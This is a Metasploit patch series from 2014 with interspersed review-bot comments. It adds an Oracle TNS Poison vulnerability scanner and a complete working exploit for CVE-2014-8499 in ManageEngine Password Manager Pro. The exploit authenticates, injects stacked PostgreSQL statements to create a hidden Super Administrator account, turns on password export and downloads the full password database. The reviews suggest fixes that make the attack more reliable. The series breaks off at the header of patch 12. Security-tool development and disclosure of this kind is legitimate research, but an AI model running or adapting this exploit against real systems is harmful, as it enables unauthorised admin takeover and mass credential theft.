From 22aabc780599ae18157ef6a61edcfd8abadb5f1c Mon Sep 17 00:00:00 2001 From: Nikita Date: Mon, 13 Oct 2014 12:21:07 +0400 Subject: [PATCH 01/38] Add new module to test TNS poison This module simply checks the server for vulnerabilities like TNS Poison --- .../scanner/oracle/tnspoison_checker.rb | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 modules/auxiliary/scanner/oracle/tnspoison_checker.rb diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb new file mode 100644 index 0000000000..4baa6684b4 --- /dev/null +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -0,0 +1,54 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::TNS + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Poison Oracle TNS Listener', + 'Description' => %q{ + This module simply checks the server for vulnerabilities like TNS Poison. + }, + 'Author' => ['ir0njaw'], + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Oct 12 2014')) + + register_options( + [ + Opt::RPORT(1521) + ], self.class) + + deregister_options('RHOST') + end + + def run_host(ip) + begin + connect + + pkt = tns_packet("(CONNECT_DATA=(COMMAND=service_register_NSGR))") + sock.put(pkt) + a= sock.read(100) + + flag = a.include? "(ERROR_STACK=(ERROR=" + if (flag==true) then print_error ip+" is not vulnerable" + else print_good ip+" is vulnerable" + end + + rescue ::Rex::ConnectionError, ::Errno::EPIPE + print_error("#{ip} unable to connect to the server") + + + rescue ::Rex::ConnectionError + rescue ::Errno::EPIPE + + end + end +end From 1996886ae91f19686b19ca07436d21d5e01c2281 Mon Sep 17 00:00:00 2001 
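Review bot: `a= sock.read(100)` in run_host can return nil when the listener closes the connection before sending anything, and `a.include?` then raises NoMethodError, which none of the rescue clauses here catch; use `a = sock.read(100).to_s` (or treat an empty reply as inconclusive) and release the socket with `disconnect` in an `ensure`, since the connection is never closed. The two trailing `rescue ::Rex::ConnectionError` / `rescue ::Errno::EPIPE` clauses are unreachable duplicates of the combined rescue above them. The verdict is also one-sided: anything other than an ERROR_STACK in the first 100 bytes, including a truncated read, is reported as vulnerable, and a non-vulnerable host is printed with print_error rather than print_status. Auxiliary::Report is included but report_vuln is never called, and References is empty although the TNS Poison issue has a public CVE (CVE-2012-1675, if I recall the advisory correctly) that should be cited.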
From: Nikita Date: Mon, 13 Oct 2014 12:53:39 +0400 Subject: [PATCH 02/38] Update tnspoison_checker.rb --- modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 4baa6684b4..075df7e05b 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -13,11 +13,12 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Poison Oracle TNS Listener', + 'Name' => 'Oracle TNS Poison vulnerability', 'Description' => %q{ This module simply checks the server for vulnerabilities like TNS Poison. }, - 'Author' => ['ir0njaw'], + 'Author' => ['ir0njaw (Kelesis Nikita'], + 'Company' => ['Digital Security - http://dsec.ru'], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Oct 12 2014')) From 621b9523b1aa3ccaa5d502fda994e2d683a622d1 Mon Sep 17 00:00:00 2001 From: Nikita Date: Mon, 13 Oct 2014 22:05:08 +0400 Subject: [PATCH 03/38] Update tnspoison_checker.rb --- modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 075df7e05b..8f22c55533 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module simply checks the server for vulnerabilities like TNS Poison. }, - 'Author' => ['ir0njaw (Kelesis Nikita'], + 'Author' => ['ir0njaw (Kelesis Nikita)'], 'Company' => ['Digital Security - http://dsec.ru'], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Oct 12 2014')) From 2843437ca998914e4ae28523e9c0c4c2793c8d00 Mon Sep 17 00:00:00 2001 
From: Pedro Ribeiro Date: Sat, 8 Nov 2014 11:24:50 +0000 Subject: [PATCH 04/38] Create exploit for CVE-2014-8499 --- .../admin/http/manageengine_pmp_sadmin.rb | 317 ++++++++++++++++++ 1 file changed, 317 insertions(+) create mode 100644 modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb diff --git a/modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb b/modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb new file mode 100644 index 0000000000..8f016b0901 --- /dev/null +++ b/modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb 
@@ -0,0 +1,317 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ManageEngine Password Manager Pro Super Administrator Account Creation and Password DB Retrieval', + 'Description' => %q{ + ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection + vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate + privileges and obtain Super Administrator access. A Super Administrator can then + use its privileges to dump the whole password database in CSV format. + PMP can use both MySQL and PostgreSQL databases but this module only exploits the + latter as MySQL does not support stacked queries with Java. + PostgreSQL is the default database in v6.8 and above, but older PMP versions can + be upgraded and continue using MySQL, so a higher version does not guarantee + exploitability. + This module has been tested on v6.8 to v7.1 build 7104 on both Windows and Linux. + The vulnerability is fixed in v7.1 build 7105 and above. 
+ }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and MSF module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2014-8499' ], + [ 'OSVDB', 'TODO' ], + [ 'URL', 'TODO_GITHUB_URL' ], + [ 'URL', 'TODO_FULLDISC_URL' ] + ], + 'DisclosureDate' => 'Nov 8 2014')) + + register_options( + [ + OptPort.new('RPORT', + [true, 'The target port', 7272]), + OptBool.new('SSL', + [true, 'Use SSL', true]), + OptString.new('USERNAME', + [true, 'The username to login as', 'guest']), + OptString.new('PASSWORD', + [true, 'Password for the specified username', 'guest']), + OptString.new('TARGETURI', [ true, "Password Manager Pro application URI", '/']) + ], self.class) + end + + + def login(username, password) + # 1st step: we obtain a JSESSIONID cookie... + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['TARGETURI'], 'PassTrixMain.cc') + }) + + if res and res.code == 200 + # 2nd step: we try to get the ORGN_NAME and AUTHRULE_NAME from the page (which is only needed for the MSP versions) + if res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/ + orgn_name = $1 + else + orgn_name = nil + end + + if res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/ + authrule_name = $1 + else + authrule_name = nil + end + + # 3rd step: we try to get the domainName for the user + cookie = res.get_cookies + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['TARGETURI'], 'login', 'AjaxResponse.jsp'), + 'ctype' => "application/x-www-form-urlencoded", + 'cookie' => cookie, + 'vars_get' => { + 'RequestType' => 'GetUserDomainName', + 'userName' => username + } + }) + if res and res.code == 200 + domain_name = res.body.to_s.strip + else + domain_name = nil + end + + # 4th step: authenticate to j_security_check, follow the redirect to PassTrixMain.cc and get its cookies. + # For some reason send_request_cgi! doesn't work, so follow the redirect manually... 
+ vars_post = { + 'j_username' => username, + 'username' => username, + 'j_password' => password + } + vars_post['ORGN_NAME'] = orgn_name if orgn_name + vars_post['AUTHRULE_NAME'] = authrule_name if authrule_name + vars_post['domainName'] = domain_name if domain_name + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['TARGETURI'], 'j_security_check;' + cookie.to_s.gsub(';','')), + 'ctype' => "application/x-www-form-urlencoded", + 'cookie' => cookie, + 'vars_post' => vars_post + }) + if res and res.code == 302 + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['TARGETURI'], 'PassTrixMain.cc'), + 'cookie' => cookie, + }) + + if res and res.code == 200 + # 5th step: get the c ookies sent in the last response + return res.get_cookies + end + end + end + return nil + end + + + def inject_sql(old_style) + # On versions older than 7000 the injection is slightly different (we call it "old style"). + # For "new style" versions we can escalate to super admin by doing + # "update aaaauthorizedrole set role_id=1 where account_id=#{user_id};insert into ptrx_superadmin values (#{user_id},true);" + # However for code simplicity let's just create a brand new user which works for both "old style" and "new style" versions. 
+ if old_style + sqli_prefix = '\\\'))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") as ' + Rex::Text.rand_text_alpha_lower(rand(8)+3) + ";" + else + sqli_prefix = '\\\'))))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") AS Ptrx_DummyPwds GROUP BY "PTRX_RID","PTRX_RNAME","PTRX_DESC","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24") as ' + Rex::Text.rand_text_alpha_lower(rand(8)+3) + ";" + end + + user_id = Rex::Text.rand_text_numeric(4) + time = Rex::Text.rand_text_numeric(8) + username = Rex::Text.rand_text_alpha_lower(6) + username_chr = "" + username.each_char do |c| + username_chr << 'chr(' << c.ord.to_s << ')||' + end + username_chr.chop!.chop! + + password = Rex::Text.rand_text_alphanumeric(10) + password_chr = "" + password.each_char do |c| + password_chr << 'chr(' << c.ord.to_s << ')||' + end + password_chr.chop!.chop! + + group_chr = "" + 'Default Group'.each_char do |c| + group_chr << 'chr(' << c.ord.to_s << ')||' + end + group_chr.chop!.chop! 
+ + sqli_command = + "insert into aaauser values (#{user_id},$$$$,$$$$,$$$$,#{time},$$$$);" + + "insert into aaapassword values (#{user_id},#{password_chr},$$$$,0,2,1,#{time});" + + "insert into aaauserstatus values (#{user_id},$$ACTIVE$$,#{time});" + + "insert into aaalogin values (#{user_id},#{user_id},#{username_chr});" + + "insert into aaaaccount values (#{user_id},#{user_id},1,1,#{time});" + + "insert into aaaauthorizedrole values (#{user_id},1);" + + "insert into aaaaccountstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});" + + "insert into aaapasswordstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});" + + "insert into aaaaccadminprofile values (#{user_id},$$" + Rex::Text.rand_text_alpha_upper(8) + "$$,-1,-1,-1,-1,-1,false,-1,-1,-1,$$$$);" + + "insert into aaaaccpassword values (#{user_id},#{user_id});" + + "insert into ptrx_resourcegroup values (#{user_id},3,#{user_id},0,0,0,0,#{group_chr},$$$$);" + + "insert into ptrx_superadmin values (#{user_id},true);" + sqli_suffix = "-- " + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['TARGETURI'], "SQLAdvancedALSearchResult.cc"), + 'cookie' => @cookie, + 'vars_post' => { + 'COUNT' => Rex::Text.rand_text_numeric(2), + 'SEARCH_ALL' => sqli_prefix + sqli_command + sqli_suffix, + 'USERID' => Rex::Text.rand_text_numeric(4) + } + }) + + return [ username, password ] + end + + + def get_version + res = send_request_cgi({ + 'uri' => normalize_uri("PassTrixMain.cc"), + 'method' => 'GET' + }) + if res && res.code == 200 && + res.body.to_s =~ /ManageEngine Password Manager Pro/ && + ( + res.body.to_s =~ /login\.css\?([0-9]+)/ || # PMP v6 + res.body.to_s =~ /login\.css\?version=([0-9]+)/ || # PMP v6 + res.body.to_s =~ /\/themes\/passtrix\/V([0-9]+)\/styles\/login\.css"/ # PMP v7 + ) + return $1.to_i + else + return 9999 + end + end + + + def check + version = get_version + case version + when 0..7104 + return Exploit::CheckCode::Appears + when 7105..9998 + return Exploit::CheckCode::Safe + 
else + return Exploit::CheckCode::Unknown + end + end + + + def run + version = get_version + @cookie = login(datastore['USERNAME'], datastore['PASSWORD']) + if @cookie == nil + fail_with(Failure::Unknown, "#{peer} - Failed to authenticate.") + end + + creds = inject_sql(version < 7000 ? true : false) + username = creds[0] + password = creds[1] + print_good("#{peer} - Created a new Super Administrator with username: #{username} | password: #{password}") + + cookie_su = login(username, password) + if cookie_su != nil + + # 1st we turn on password exports + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['TARGETURI'], 'ConfigureOffline.ve'), + 'cookie' => cookie_su, + 'vars_post' => { + 'IS_XLS' => 'true', + 'includePasswd' => 'true', + 'HOMETAB' => 'true', + 'RESTAB' => 'true', + 'RGTAB' => 'true', + 'PASSWD_RULE' => 'Offline Password File', + 'LOGOUT_TIME' => '20' + } + }) + + # now get the loot! + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['TARGETURI'], 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), + 'cookie' => cookie_su, + 'vars_get' => { + 'RequestType' => 'ExportResources' + } + }) + if res and res.code == 200 and res.body.to_s.length > 0 + vprint_line(res.body.to_s) + print_good("#{peer} - Successfully exported password database from Password Manager Pro.") + loot_name = 'manageengine.passwordmanagerpro.password.db' + loot_type = 'text/csv' + loot_filename = 'manageengine_pmp_password_db.csv' + loot_desc = 'ManageEngine Password Manager Pro Password DB' + p = store_loot( + loot_name, + loot_type, + rhost, + res.body, + loot_filename, + loot_desc) + print_status "Password database saved in: #{p}" + else + print_error("#{peer} - Failed to export Password Manager Pro passwords.") + end + status = Metasploit::Model::Login::Status::SUCCESSFUL + else + print_error("#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") + status = 
Metasploit::Model::Login::Status::DENIED_ACCESS + end + + service_data = { + address: rhost, + port: rport, + service_name: 'https', + protocol: 'tcp', + workspace_id: myworkspace_id + } + credential_data = { + origin_type: :service, + module_fullname: self.fullname, + private_type: :password, + private_data: username, + username: password + } + + credential_data.merge!(service_data) + credential_core = create_credential(credential_data) + login_data = { + core: credential_core, + access_level: 'Super Administrator', + status: status, + last_attempted_at: DateTime.now + } + login_data.merge!(service_data) + create_credential_login(login_data) + end +end From 143033f6571ece11a313fc078965e9e604ed5472 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Sat, 8 Nov 2014 11:28:04 +0000 Subject: [PATCH 05/38] Rename manageengine_pmp_sadmin.rb to manageengine_pmp_privesc.rb --- .../{manageengine_pmp_sadmin.rb => manageengine_pmp_privesc.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/admin/http/{manageengine_pmp_sadmin.rb => manageengine_pmp_privesc.rb} (100%) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb similarity index 100% rename from modules/auxiliary/admin/http/manageengine_pmp_sadmin.rb rename to modules/auxiliary/admin/http/manageengine_pmp_privesc.rb From f680b666c735dfa2acf5926b9d8c857059914c5e Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Sat, 8 Nov 2014 11:29:36 +0000 Subject: [PATCH 06/38] Add github adv URL --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 8f016b0901..5e850b7be1 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb 
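Review bot: The credential reported at the end of run has its fields swapped: `private_data: username, username: password` stores the new account's name as the secret and its password as the login name, so the Super Administrator credential is recorded unusably; it should read `private_data: password, username: username`. inject_sql never inspects the response of the SQLAdvancedALSearchResult.cc POST and unconditionally returns the generated credentials, so a failed injection is only detected indirectly by the later login; checking `res` there (and failing with a clear message when it is nil or not 200) would give the operator a real diagnostic. The module also leaves the created Super Administrator account and the password-export setting enabled via ConfigureOffline.ve in place with no cleanup path, which the Description or a print_warning should tell the operator so the account can be removed by hand.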
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'CVE', '2014-8499' ], [ 'OSVDB', 'TODO' ], - [ 'URL', 'TODO_GITHUB_URL' ], + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ], [ 'URL', 'TODO_FULLDISC_URL' ] ], 'DisclosureDate' => 'Nov 8 2014')) From b3c27452cd849d4799d7f6bfa0c4f9c3f09e79c8 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Sun, 9 Nov 2014 10:40:41 +0000 Subject: [PATCH 07/38] Add full disclosure URL --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 5e850b7be1..ea38702005 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary [ 'CVE', '2014-8499' ], [ 'OSVDB', 'TODO' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ], - [ 'URL', 'TODO_FULLDISC_URL' ] + [ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ] ], 'DisclosureDate' => 'Nov 8 2014')) From eb36a36272efabbb0c85cb84b42b07aa01885150 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:40:22 -0600 Subject: [PATCH 08/38] Change title --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index ea38702005..5033addf57 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb 
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'ManageEngine Password Manager Pro Super Administrator Account Creation and Password DB Retrieval', + 'Name' => 'ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection', 'Description' => %q{ ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'CVE', '2014-8499' ], - [ 'OSVDB', 'TODO' ], + #[ 'OSVDB', 'TODO' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ], [ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ] ], From 8ddd6a465512d2fd9d8dbc871b37242849d631ff Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:42:30 -0600 Subject: [PATCH 09/38] Redefine RPORT having into account it is builtin --- .../admin/http/manageengine_pmp_privesc.rb | 27 ++++++++----------- 1 file changed, 11 insertions(+), 16 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 5033addf57..1422378db5 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb 
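Review bot: The new module Name splits the product name, so `'ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection'` reads as though "Pro" belongs to the endpoint; the endpoint should follow the full product name, `'Name' => 'ManageEngine Password Manager Pro SQLAdvancedALSearchResult.cc SQL Injection'`. In the second hunk, a commented-out `#[ 'OSVDB', 'TODO' ]` placeholder is easy to forget in the tree; either fill in the identifier or drop the line rather than leaving dead metadata. initialize continues outside both hunks.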
@@ -17,14 +17,13 @@ class Metasploit3 < Msf::Auxiliary ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate privileges and obtain Super Administrator access. A Super Administrator can then - use its privileges to dump the whole password database in CSV format. - PMP can use both MySQL and PostgreSQL databases but this module only exploits the - latter as MySQL does not support stacked queries with Java. - PostgreSQL is the default database in v6.8 and above, but older PMP versions can - be upgraded and continue using MySQL, so a higher version does not guarantee - exploitability. - This module has been tested on v6.8 to v7.1 build 7104 on both Windows and Linux. - The vulnerability is fixed in v7.1 build 7105 and above. + use its privileges to dump the whole password database in CSV format. PMP can use + both MySQL and PostgreSQL databases but this module only exploits the latter as + MySQL does not support stacked queries with Java. PostgreSQL is the default database + in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL, + so a higher version does not guarantee exploitability. This module has been tested + on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in + v7.1 build 7105 and above. }, 'Author' => [ 
@@ -42,14 +41,10 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptPort.new('RPORT', - [true, 'The target port', 7272]), - OptBool.new('SSL', - [true, 'Use SSL', true]), - OptString.new('USERNAME', - [true, 'The username to login as', 'guest']), - OptString.new('PASSWORD', - [true, 'Password for the specified username', 'guest']), + Opt::RPORT(7272), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('USERNAME', [true, 'The username to login as', 'guest']), + OptString.new('PASSWORD', [true, 'Password for the specified username', 'guest']), OptString.new('TARGETURI', [ true, "Password Manager Pro application URI", '/']) ], self.class) end From ee4924582a18c1fdfbf5e83fbf835a6eceb93d22 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:43:44 -0600 Subject: [PATCH 10/38] Use target_uri --- .../admin/http/manageengine_pmp_privesc.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 1422378db5..d8e1e059c2 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary # 1st step: we obtain a JSESSIONID cookie... res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(datastore['TARGETURI'], 'PassTrixMain.cc') + 'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc') }) if res and res.code == 200 @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary cookie = res.get_cookies res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(datastore['TARGETURI'], 'login', 'AjaxResponse.jsp'), + 'uri' => normalize_uri(target_uri.path, 'login', 'AjaxResponse.jsp'), 'ctype' => "application/x-www-form-urlencoded", 'cookie' => cookie, 'vars_get' => { 
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(datastore['TARGETURI'], 'j_security_check;' + cookie.to_s.gsub(';','')), + 'uri' => normalize_uri(target_uri.path, 'j_security_check;' + cookie.to_s.gsub(';','')), 'ctype' => "application/x-www-form-urlencoded", 'cookie' => cookie, 'vars_post' => vars_post @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 302 res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(datastore['TARGETURI'], 'PassTrixMain.cc'), + 'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc'), 'cookie' => cookie, }) @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(datastore['TARGETURI'], "SQLAdvancedALSearchResult.cc"), + 'uri' => normalize_uri(target_uri.path, "SQLAdvancedALSearchResult.cc"), 'cookie' => @cookie, 'vars_post' => { 'COUNT' => Rex::Text.rand_text_numeric(2), @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary # 1st we turn on password exports send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(datastore['TARGETURI'], 'ConfigureOffline.ve'), + 'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'), 'cookie' => cookie_su, 'vars_post' => { 'IS_XLS' => 'true', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Auxiliary # now get the loot! res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(datastore['TARGETURI'], 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), + 'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'), 'cookie' => cookie_su, 'vars_get' => { 'RequestType' => 'ExportResources' From 8b8ab61e3d575ff3a838cd9eadf39bdef1a74e63 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:45:12 -0600 Subject: [PATCH 11/38] Favor && over and --- .../auxiliary/admin/http/manageengine_pmp_privesc.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) 
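Review bot: The switch to target_uri.path misses get_version, which still requests `normalize_uri("PassTrixMain.cc")` with no TARGETURI prefix (visible in the original listing and in the context of later patches), so `check` and the version-dependent injection style chosen in run break whenever the application is not mounted at `/`; change that call to `'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc')`. The j_security_check line still builds the request path from the whole cookie string, `'j_security_check;' + cookie.to_s.gsub(';','')`, which only yields a valid `;jsessionid=...` path parameter when JSESSIONID is the sole cookie returned; extracting the JSESSIONID value explicitly would be more robust if the server ever sets additional cookies. Each of these hunks sits inside a method (login, inject_sql, run) that extends beyond the hunk.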
diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index d8e1e059c2..ae6517d5fd 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc') }) - if res and res.code == 200 + if res && res.code == 200 # 2nd step: we try to get the ORGN_NAME and AUTHRULE_NAME from the page (which is only needed for the MSP versions) if res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/ orgn_name = $1 @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary 'userName' => username } }) - if res and res.code == 200 + if res && res.code == 200 domain_name = res.body.to_s.strip else domain_name = nil @@ -107,14 +107,14 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => cookie, 'vars_post' => vars_post }) - if res and res.code == 302 + if res && res.code == 302 res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc'), 'cookie' => cookie, }) - if res and res.code == 200 + if res && res.code == 200 # 5th step: get the c ookies sent in the last response return res.get_cookies end @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary 'RequestType' => 'ExportResources' } }) - if res and res.code == 200 and res.body.to_s.length > 0 + if res && res.code == 200 && res.body.to_s.length > 0 vprint_line(res.body.to_s) print_good("#{peer} - Successfully exported password database from Password Manager Pro.") loot_name = 'manageengine.passwordmanagerpro.password.db' From 2236518694142b2a6033dd675ab83277605dff36 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Nov 2014 09:47:05 -0600 Subject: [PATCH 12/38] Check res.body before accessing #to_s --- .../auxiliary/admin/http/manageengine_pmp_privesc.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) 
